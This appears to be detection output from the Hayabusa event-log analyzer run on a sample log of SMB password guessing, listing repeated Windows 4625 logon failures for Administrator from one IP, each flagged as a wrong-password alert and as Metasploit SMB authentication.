+2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w1obedLuMFlHlSvA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EPn1yJV358YAFALV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qA7N5DMAJqNYkumM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2Lk95NYGG5iLBFBw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x3DDtXECsK61pIYy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rt8bfBDTV5wYfBO4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uTYMgN5kmFpyj7xN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RmyF6j61wosCE0sg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fd61fJBRizl2AIGe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bDIFX7lsmGqSGvkA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UVmto6S25gU2bkwa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B7QMbzSuGuzzMK0v  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VJUynF5bN1Oj0vaP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dg4ZtybY5BnPN0nX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gRmRV9ct3hor8Muk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QRjaP1mj9FgKsGBE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3CCzzatQ195mcxQ8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QJPIrtk5GBAhsUlR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 720RHwyXQcxvsJBu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GofmHRstuhljMDOL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wQUQ4INktwXwRkaY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8WHs5hduf7SmUcLK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gdo1txjJXiRLbUDH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JK8jP3ftKQOyutGe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DdbEjo88dBJRhrKp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FZCVkXkwhbuSM654  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z2mc9WScfBa88rtO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Lee7qYLkXQoz8rRh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f5g1ZKpZuZU1WRoC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h4ST7RrHJxAQHHbn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GtW1hBHF97YqvN4N  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xVKlPytPofO9LQBm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GOkZ9yjvfL51UYXo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fAxfxSbRqGO7Dej0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: D7XmvDYk6zFLir09  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mWcl6CKdSMxd8edZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SxBQlFZvGBqDdobn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AXN94VanwME6q8rc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JOj7CZ3stJXePY8b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DXjmqxguFGL3f8cV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qHWmdxnRrMbxrdlN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6ROBnjuyHn4FRugk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zGxuUxasL680O21l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CYoM984EzAkUtBoa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0e3ATNpzeeAf6Qax  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q1A0dGhpVy8kgiRP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
